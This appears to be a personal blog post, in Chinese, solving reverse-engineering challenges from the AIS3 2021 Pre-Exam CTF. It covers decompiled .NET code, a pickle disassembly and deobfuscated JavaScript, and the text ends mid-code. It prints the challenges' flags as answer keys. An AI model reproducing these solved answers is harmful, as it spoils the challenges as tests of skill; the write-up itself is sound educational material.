<!DOCTYPE html>
<html lang="zh-tw">

  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="Content-Language" content="zh-tw">
    <meta name="color-scheme" content="light dark">

    

    <meta name="author" content="x2w-sloth">
    <meta name="description" content="雖然只有解出每個領域的簡單題目
還是厚著臉皮寫一下Writeup好了
反正抽查也被抽中了Q_Q
 REVERSE    Piano    題目是一個.NET的exe檔。
有12個鍵給你按、讓你彈鋼琴。
 只要是.NET一律丟進dnSpy反編譯。
先來看他的click handler，基本上就是讓你按下去時會放那個音階的.wav檔
但是輸入第14個音後有點有趣，會跑一個isValid()
如果過了isValid()就會跳出一個視窗，內容是nya()
可以聯想到可能要按下14個特定的音
// piano.Piano // Token: 0x06000002 RID: 2 RVA: 0x00002190 File Offset: 0x00000390 private void onClickHandler(object sender, EventArgs e) { Button button = (Button)sender; this.notes.Add(this.buttons.IndexOf(button)); this.audio.SoundLocation = Path.Combine(this.rootLocation, &#34;..\\Resources\\&#34; &#43; button.Name &#43; &#34;.wav&#34;); this.audio.Play(); if (this.notes.Count == 14) { if (this.isValid()) { MessageBox.Show(this.nya()); } this.notes.RemoveAt(0); } } 先來看nya()
內容多半就是Flag了
回傳值是list裡面的每個int和我們按下的notes一直XOR到底">
    <meta name="keywords" content="">

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="AIS3 2021 Pre-Exam Writeup"/>
<meta name="twitter:description" content="雖然只有解出每個領域的簡單題目
還是厚著臉皮寫一下Writeup好了
反正抽查也被抽中了Q_Q
 REVERSE    Piano    題目是一個.NET的exe檔。
有12個鍵給你按、讓你彈鋼琴。
 只要是.NET一律丟進dnSpy反編譯。
先來看他的click handler，基本上就是讓你按下去時會放那個音階的.wav檔
但是輸入第14個音後有點有趣，會跑一個isValid()
如果過了isValid()就會跳出一個視窗，內容是nya()
可以聯想到可能要按下14個特定的音
// piano.Piano // Token: 0x06000002 RID: 2 RVA: 0x00002190 File Offset: 0x00000390 private void onClickHandler(object sender, EventArgs e) { Button button = (Button)sender; this.notes.Add(this.buttons.IndexOf(button)); this.audio.SoundLocation = Path.Combine(this.rootLocation, &#34;..\\Resources\\&#34; &#43; button.Name &#43; &#34;.wav&#34;); this.audio.Play(); if (this.notes.Count == 14) { if (this.isValid()) { MessageBox.Show(this.nya()); } this.notes.RemoveAt(0); } } 先來看nya()
內容多半就是Flag了
回傳值是list裡面的每個int和我們按下的notes一直XOR到底"/>

    <meta property="og:title" content="AIS3 2021 Pre-Exam Writeup" />
<meta property="og:description" content="雖然只有解出每個領域的簡單題目
還是厚著臉皮寫一下Writeup好了
反正抽查也被抽中了Q_Q
 REVERSE    Piano    題目是一個.NET的exe檔。
有12個鍵給你按、讓你彈鋼琴。
 只要是.NET一律丟進dnSpy反編譯。
先來看他的click handler，基本上就是讓你按下去時會放那個音階的.wav檔
但是輸入第14個音後有點有趣，會跑一個isValid()
如果過了isValid()就會跳出一個視窗，內容是nya()
可以聯想到可能要按下14個特定的音
// piano.Piano // Token: 0x06000002 RID: 2 RVA: 0x00002190 File Offset: 0x00000390 private void onClickHandler(object sender, EventArgs e) { Button button = (Button)sender; this.notes.Add(this.buttons.IndexOf(button)); this.audio.SoundLocation = Path.Combine(this.rootLocation, &#34;..\\Resources\\&#34; &#43; button.Name &#43; &#34;.wav&#34;); this.audio.Play(); if (this.notes.Count == 14) { if (this.isValid()) { MessageBox.Show(this.nya()); } this.notes.RemoveAt(0); } } 先來看nya()
內容多半就是Flag了
回傳值是list裡面的每個int和我們按下的notes一直XOR到底" />
<meta property="og:type" content="article" />
<meta property="og:url" content="/posts/ais3_2021_pre_exam_writeup/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-05-25T17:23:15&#43;08:00" />
<meta property="article:modified_time" content="2021-05-25T17:23:15&#43;08:00" />



    <title>
  AIS3 2021 Pre-Exam Writeup · SLOTH
</title>

    
      <link rel="canonical" href="/posts/ais3_2021_pre_exam_writeup/">
    

    <link rel="preload" href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>

    
      
      
      <link rel="stylesheet" href="/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
    

    

    
      
        
        
        <link rel="stylesheet" href="/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
      
    

    

    

    <link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16">

    <link rel="apple-touch-icon" href="/images/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

    

    <meta name="generator" content="Hugo 0.83.1" />
  </head>

  
  
    
  
  <body class="preload-transitions colorscheme-auto"
        onload=""
  >
    
<div class="float-container">
    <a id="dark-mode-toggle" class="colorscheme-toggle">
        <i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
    </a>
</div>


    <main class="wrapper">
      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="/">
      SLOTH
    </a>
    
      <input type="checkbox" id="menu-toggle" />
      <label class="menu-button float-right" for="menu-toggle">
        <i class="fa fa-bars fa-fw" aria-hidden="true"></i>
      </label>
      <ul class="navigation-list">
        
          
            <li class="navigation-item">
              <a class="navigation-link" href="/posts/">Blog</a>
            </li>
          
        
        
      </ul>
    
  </section>
</nav>


      <div class="content">
        
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">
            <a class="title-link" href="/posts/ais3_2021_pre_exam_writeup/">
              AIS3 2021 Pre-Exam Writeup
            </a>
          </h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fa fa-calendar" aria-hidden="true"></i>
              <time datetime='2021-05-25T17:23:15&#43;08:00'>
                May 25, 2021
              </time>
            </span>
            <span class="reading-time">
              <i class="fa fa-clock-o" aria-hidden="true"></i>
              閱讀時間 12 分鐘
            </span>
          </div>
          
          
          <div class="tags">
  <i class="fa fa-tag" aria-hidden="true"></i>
    <span class="tag">
      <a href="/tags/ctf/">CTF</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/ais3/">AIS3</a>
    </span></div>

        </div>
      </header>

      <div>
        
        <p>雖然只有解出每個領域的簡單題目</p>
<p>還是厚著臉皮寫一下Writeup好了</p>
<p>反正抽查也被抽中了Q_Q</p>
<hr>
<h1 id="reverse">
  REVERSE
  <a class="heading-link" href="#reverse">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h1>
<h2 id="piano">
  Piano
  <a class="heading-link" href="#piano">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目是一個.NET的exe檔。</p>
<p>有12個鍵給你按、讓你彈鋼琴。</p>
<figure><img src="/img/ais3_2021/pre_exam/piano01.png"/>
</figure>

<p>只要是.NET一律丟進dnSpy反編譯。</p>
<p>先來看他的click handler，基本上就是讓你按下去時會放那個音階的.wav檔</p>
<p>但是輸入第14個音後有點有趣，會跑一個<code>isValid()</code></p>
<p>如果過了<code>isValid()</code>就會跳出一個視窗，內容是<code>nya()</code></p>
<p>可以聯想到可能要按下14個特定的音</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-cs" data-lang="cs"><span style="color:#75715e">// piano.Piano
</span><span style="color:#75715e">// Token: 0x06000002 RID: 2 RVA: 0x00002190 File Offset: 0x00000390
</span><span style="color:#75715e"></span><span style="color:#66d9ef">private</span> <span style="color:#66d9ef">void</span> onClickHandler(<span style="color:#66d9ef">object</span> sender, EventArgs e)
{
  Button button = (Button)sender;
  <span style="color:#66d9ef">this</span>.notes.Add(<span style="color:#66d9ef">this</span>.buttons.IndexOf(button));
  <span style="color:#66d9ef">this</span>.audio.SoundLocation = Path.Combine(<span style="color:#66d9ef">this</span>.rootLocation, <span style="color:#e6db74">&#34;..\\Resources\\&#34;</span> + button.Name + <span style="color:#e6db74">&#34;.wav&#34;</span>);
  <span style="color:#66d9ef">this</span>.audio.Play();
  <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span>.notes.Count == <span style="color:#ae81ff">14</span>)
  {
    <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span>.isValid())
    {
      MessageBox.Show(<span style="color:#66d9ef">this</span>.nya());
    }
    <span style="color:#66d9ef">this</span>.notes.RemoveAt(<span style="color:#ae81ff">0</span>);
  }
}
</code></pre></div><p>先來看<code>nya()</code></p>
<p>內容多半就是Flag了</p>
<p>回傳值是list裡面的每個int和我們按下的notes一直XOR到底</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-cs" data-lang="cs"><span style="color:#75715e">// piano.Piano
</span><span style="color:#75715e">// Token: 0x06000004 RID: 4 RVA: 0x0000236C File Offset: 0x0000056C
</span><span style="color:#75715e"></span><span style="color:#66d9ef">private</span> <span style="color:#66d9ef">string</span> nya()
{
  List&lt;<span style="color:#66d9ef">int</span>&gt; list = <span style="color:#66d9ef">new</span> List&lt;<span style="color:#66d9ef">int</span>&gt; {
    <span style="color:#ae81ff">70</span>, <span style="color:#ae81ff">78</span>, <span style="color:#ae81ff">89</span>, <span style="color:#ae81ff">57</span>, <span style="color:#ae81ff">112</span>, <span style="color:#ae81ff">60</span>, <span style="color:#ae81ff">125</span>, <span style="color:#ae81ff">96</span>, <span style="color:#ae81ff">103</span>, <span style="color:#ae81ff">104</span>,
    <span style="color:#ae81ff">50</span>, <span style="color:#ae81ff">109</span>, <span style="color:#ae81ff">87</span>, <span style="color:#ae81ff">115</span>, <span style="color:#ae81ff">112</span>, <span style="color:#ae81ff">54</span>, <span style="color:#ae81ff">100</span>, <span style="color:#ae81ff">97</span>, <span style="color:#ae81ff">103</span>, <span style="color:#ae81ff">56</span>,
    <span style="color:#ae81ff">85</span>, <span style="color:#ae81ff">101</span>, <span style="color:#ae81ff">56</span>, <span style="color:#ae81ff">119</span>, <span style="color:#ae81ff">119</span>, <span style="color:#ae81ff">100</span>, <span style="color:#ae81ff">59</span>, <span style="color:#ae81ff">88</span>, <span style="color:#ae81ff">50</span>, <span style="color:#ae81ff">48</span>,
    <span style="color:#ae81ff">62</span>, <span style="color:#ae81ff">120</span>, <span style="color:#ae81ff">84</span>, <span style="color:#ae81ff">58</span>, <span style="color:#ae81ff">100</span>, <span style="color:#ae81ff">86</span>, <span style="color:#ae81ff">74</span>, <span style="color:#ae81ff">92</span>, <span style="color:#ae81ff">54</span>, <span style="color:#ae81ff">96</span>,
    <span style="color:#ae81ff">60</span>, <span style="color:#ae81ff">117</span>, <span style="color:#ae81ff">119</span>, <span style="color:#ae81ff">122</span>
  };
  List&lt;<span style="color:#66d9ef">char</span>&gt; list2 = <span style="color:#66d9ef">new</span> List&lt;<span style="color:#66d9ef">char</span>&gt;();
  <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i = <span style="color:#ae81ff">0</span>; i &lt; list.Count; i++)
  {
    list2.Add((<span style="color:#66d9ef">char</span>)(list[i] ^ <span style="color:#66d9ef">this</span>.notes[i % <span style="color:#66d9ef">this</span>.notes.Count]));
  }
  <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">new</span> <span style="color:#66d9ef">string</span>(list2.ToArray());
}
</code></pre></div><p>但是因為解出來的字串和我們按下的notes直接相關，</p>
<p>不能直接patch判斷valid地方，需要確定這14個音到底是什麼</p>
<p>再來看一下<code>isValid()</code></p>
<p>已經給出第<code>i</code>個音和第<code>(i+1) % 14</code>個音之間的關係</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-cs" data-lang="cs"><span style="color:#75715e">// piano.Piano
</span><span style="color:#75715e">// Token: 0x06000003 RID: 3 RVA: 0x00002220 File Offset: 0x00000420
</span><span style="color:#75715e"></span><span style="color:#66d9ef">private</span> <span style="color:#66d9ef">bool</span> isValid()
{
  List&lt;<span style="color:#66d9ef">int</span>&gt; list = <span style="color:#66d9ef">new</span> List&lt;<span style="color:#66d9ef">int</span>&gt; {
    <span style="color:#ae81ff">14</span>, <span style="color:#ae81ff">17</span>, <span style="color:#ae81ff">20</span>, <span style="color:#ae81ff">21</span>, <span style="color:#ae81ff">22</span>, <span style="color:#ae81ff">21</span>, <span style="color:#ae81ff">19</span>, <span style="color:#ae81ff">18</span>, <span style="color:#ae81ff">12</span>, <span style="color:#ae81ff">6</span>, <span style="color:#ae81ff">11</span>, <span style="color:#ae81ff">16</span>, <span style="color:#ae81ff">15</span>, <span style="color:#ae81ff">14</span>
  };
  List&lt;<span style="color:#66d9ef">int</span>&gt; list2 = <span style="color:#66d9ef">new</span> List&lt;<span style="color:#66d9ef">int</span>&gt; {
    <span style="color:#ae81ff">0</span>,  -<span style="color:#ae81ff">3</span>,  <span style="color:#ae81ff">0</span>, -<span style="color:#ae81ff">1</span>,  <span style="color:#ae81ff">0</span>,  <span style="color:#ae81ff">1</span>,  <span style="color:#ae81ff">1</span>,  <span style="color:#ae81ff">0</span>,  <span style="color:#ae81ff">6</span>, <span style="color:#ae81ff">0</span>, -<span style="color:#ae81ff">5</span>,  <span style="color:#ae81ff">0</span>,  <span style="color:#ae81ff">1</span>,  <span style="color:#ae81ff">0</span>
  };
  <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i = <span style="color:#ae81ff">0</span>; i &lt; <span style="color:#ae81ff">14</span>; i++)
  {
    <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span>.notes[i] + <span style="color:#66d9ef">this</span>.notes[(i + <span style="color:#ae81ff">1</span>) % <span style="color:#ae81ff">14</span>] != list[i])
    {
      <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">false</span>;
    }
    <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span>.notes[i] - <span style="color:#66d9ef">this</span>.notes[(i + <span style="color:#ae81ff">1</span>) % <span style="color:#ae81ff">14</span>] != list2[i])
    {
      <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">false</span>;
    }
  }
  <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">true</span>;
}
</code></pre></div><p>解完聯立後發現這14個音是</p>
<p><code>C#, C#, G#, G#, A#, A#, G#, F#, F#, F, F, D#, D#, C#</code></p>
<p>彈完小星星之後就跳出一個視窗給你Flag了</p>
<p><code>AIS3{7wink1e_tw1nkl3_l1ttl3_574r_1n_C_5h4rp}</code></p>
<hr>
<h2 id="peekora">
  🐰Peekora🥒
  <a class="heading-link" href="#peekora">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目是一個Python Pickle檔：<code>flag_checker.pkl</code></p>
<p>可以用 <code>python -m pickle flag_checker.pkl</code> 執行它</p>
<p>並且如名字所示, 成功輸入flag就會print(&ldquo;Correct!&quot;)</p>
<p>輸入錯誤的話會直接exit, 不讓你用pickle把它load完。</p>
<p>只能乖乖做靜態分析了</p>
<p><code>python -m pickletools -a flag_checker.pkl</code></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-txt" data-lang="txt">    0: c    GLOBAL     &#39;__builtin__ input&#39; Push a global object (module.attr) on the stack.
   19: (    MARK                           Push markobject onto the stack.
   20: S        STRING     &#39;FLAG: &#39;        Push a Python string object.
   30: t        TUPLE      (MARK at 19)    Build a tuple out of the topmost stack slice, after markobject.
   31: R    REDUCE                         Push an object built from a callable and an argument tuple.
   32: p    PUT        0                   Store the stack top into the memo.  The stack is not popped.
   35: 0    POP                            Discard the top stack item, shrinking the stack by one item.
   36: c    GLOBAL     &#39;__builtin__ getattr&#39; Push a global object (module.attr) on the stack.
   57: p    PUT        1                     Store the stack top into the memo.  The stack is not popped.
   60: 0    POP                              Discard the top stack item, shrinking the stack by one item.
   61: g    GET        1                     Read an object from the memo and push it on the stack.
   64: (    MARK                             Push markobject onto the stack.
   65: (        MARK                         Push markobject onto the stack.
   66: c            GLOBAL     &#39;__builtin__ exit&#39; Push a global object (module.attr) on the stack.
   84: c            GLOBAL     &#39;__builtin__ str&#39;  Push a global object (module.attr) on the stack.
  101: l            LIST       (MARK at 65)       Build a list out of the topmost stack slice, after markobject.
  102: S        STRING     &#39;__getitem__&#39;          Push a Python string object.
  117: t        TUPLE      (MARK at 64)           Build a tuple out of the topmost stack slice, after markobject.
  118: R    REDUCE                                Push an object built from a callable and an argument tuple.
  119: p    PUT        2                          Store the stack top into the memo.  The stack is not popped.
  122: 0    POP                                   Discard the top stack item, shrinking the stack by one item.
  123: g    GET        2                          Read an object from the memo and push it on the stack.
  126: (    MARK                                  Push markobject onto the stack.
  127: g        GET        1                      Read an object from the memo and push it on the stack.
  130: (        MARK                              Push markobject onto the stack.
  131: g            GET        0                  Read an object from the memo and push it on the stack.
  134: S            STRING     &#39;startswith&#39;       Push a Python string object.
  148: t            TUPLE      (MARK at 130)      Build a tuple out of the topmost stack slice, after markobject.
  149: R        REDUCE                            Push an object built from a callable and an argument tuple.
  150: (        MARK                              Push markobject onto the stack.
  151: S            STRING     &#39;AIS3{&#39;            Push a Python string object.
  160: t            TUPLE      (MARK at 150)      Build a tuple out of the topmost stack slice, after markobject.
  161: R        REDUCE                            Push an object built from a callable and an argument tuple.
  162: t        TUPLE      (MARK at 126)          Build a tuple out of the topmost stack slice, after markobject.
  163: R    REDUCE                                Push an object built from a callable and an argument tuple.
# 以下略...
</code></pre></div><p>沒什麼好說的，就是大部分直譯語言執行期的架構，用stack呼叫函數</p>
<p>pickletools 有幫忙把段落indent真的是幫了大忙。</p>
<p>接下來就要使用<em>超凡的意志力</em>盯著它看，</p>
<p>然後悟出flag會經過以下的test：</p>
<ul>
<li>flag.startswith(&lsquo;AIS3{')</li>
<li>flag.endswith('}')</li>
<li>flag[6] == &lsquo;A&rsquo;</li>
<li>flag[9] == &lsquo;j&rsquo;</li>
<li>flag[11] == &lsquo;p&rsquo;</li>
<li>flag[14] == flag[9]</li>
<li>flag[5] == &rsquo;d&rsquo;</li>
<li>flag[10] == &lsquo;z&rsquo;</li>
<li>flag[12] == &lsquo;h&rsquo;</li>
<li>flag[13] == flag[1]</li>
<li>flag[8] == &lsquo;w&rsquo;</li>
<li>flag[7] == &rsquo;m'</li>
</ul>
<p>所以最後拼出來的flag是</p>
<p><code>AIS3{dAmwjzphIj}</code></p>
<hr>
<h2 id="colors">
  Colors
  <a class="heading-link" href="#colors">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目連結是這個網頁，馬上有不好的預感會是Reverse JS題</p>
<figure><img src="/img/ais3_2021/pre_exam/colors01.png"/>
</figure>

<p>前10個字母的html長這樣(很重要，等一下會考)</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c0 r0&#34;</span>&gt;i&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c0 r0&#34;</span>&gt;n&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c0 r0&#34;</span>&gt;p&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c0 r0&#34;</span>&gt;u&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c0 r0&#34;</span>&gt;t&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c1 r0&#34;</span>&gt;s&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c1 r0&#34;</span>&gt;e&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c1 r0&#34;</span>&gt;c&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c1 r0&#34;</span>&gt;r&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c1 r0&#34;</span>&gt;e&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;c1 r0&#34;</span>&gt;t&lt;/<span style="color:#f92672">div</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
</code></pre></div><p>然後題目的Javascript有做obfuscation，所以真的有夠醜。</p>
<p>經過一些簡化以及重新命名後，有關secret code的邏輯：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js">document[<span style="color:#e6db74">&#39;addEventListener&#39;</span>](<span style="color:#e6db74">&#39;keydown&#39;</span>, <span style="color:#a6e22e">LISTENER</span>=&gt;{
    <span style="color:#66d9ef">const</span> <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x12b963</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">f2</span>;
    <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;Backspace&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xa</span>)
        <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span>[<span style="color:#e6db74">&#39;textContent&#39;</span>] <span style="color:#f92672">=</span> <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span>[<span style="color:#e6db74">&#39;textContent&#39;</span>][<span style="color:#e6db74">&#39;substr&#39;</span>](<span style="color:#ae81ff">0x0</span>, <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span>[<span style="color:#e6db74">&#39;textContent&#39;</span>][<span style="color:#e6db74">&#39;length&#39;</span>] <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x1</span>);
    <span style="color:#66d9ef">else</span> {
        <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;ArrowUp&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">!</span>(<span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">0x1</span>))
            <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">0x1</span>;
        <span style="color:#66d9ef">else</span> {
            <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;ArrowDown&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">!</span>(<span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">0x2</span>))
                <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">0x1</span>;
            <span style="color:#66d9ef">else</span> {
                <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;ArrowLeft&#39;</span> <span style="color:#f92672">&amp;&amp;</span> (<span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x4</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x6</span>))
                    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">0x1</span>;
                <span style="color:#66d9ef">else</span> {
                    <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;ArrowRight&#39;</span> <span style="color:#f92672">&amp;&amp;</span> (<span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x5</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x7</span>))
                        <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">0x1</span>;
                    <span style="color:#66d9ef">else</span> {
                        <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;b&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x8</span>)
                            <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">0x1</span>;
                        <span style="color:#66d9ef">else</span> {
                            <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;a&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x9</span>)
                                <span style="color:#66d9ef">return</span> document[<span style="color:#e6db74">&#39;getElementsByTagName&#39;</span>](<span style="color:#e6db74">&#39;body&#39;</span>)[<span style="color:#ae81ff">0x0</span>][<span style="color:#e6db74">&#39;innerHTML&#39;</span>] <span style="color:#f92672">+=</span> <span style="color:#a6e22e">atob</span>(<span style="color:#a6e22e">b1</span>),
                                <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span> <span style="color:#f92672">=</span> document[<span style="color:#e6db74">&#39;getElementById&#39;</span>](<span style="color:#e6db74">&#39;input&#39;</span>),
                                <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span>[<span style="color:#e6db74">&#39;innerHTML&#39;</span>] <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>, <span style="color:#75715e">// unlock input
</span><span style="color:#75715e"></span>                                document[<span style="color:#e6db74">&#39;getElementById&#39;</span>](<span style="color:#e6db74">&#39;output&#39;</span>)[<span style="color:#e6db74">&#39;innerHTML&#39;</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">atob</span>(<span style="color:#a6e22e">b2</span>)[<span style="color:#e6db74">&#39;match&#39;</span>](<span style="color:#e6db74">/(.{1,3})/g</span>)[<span style="color:#e6db74">&#39;map&#39;</span>](<span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x5efa9e</span>=&gt;<span style="color:#a6e22e">TAG</span>(<span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x5efa9e</span>[<span style="color:#ae81ff">0x0</span>], <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x5efa9e</span>[<span style="color:#ae81ff">0x1</span>], <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x5efa9e</span>[<span 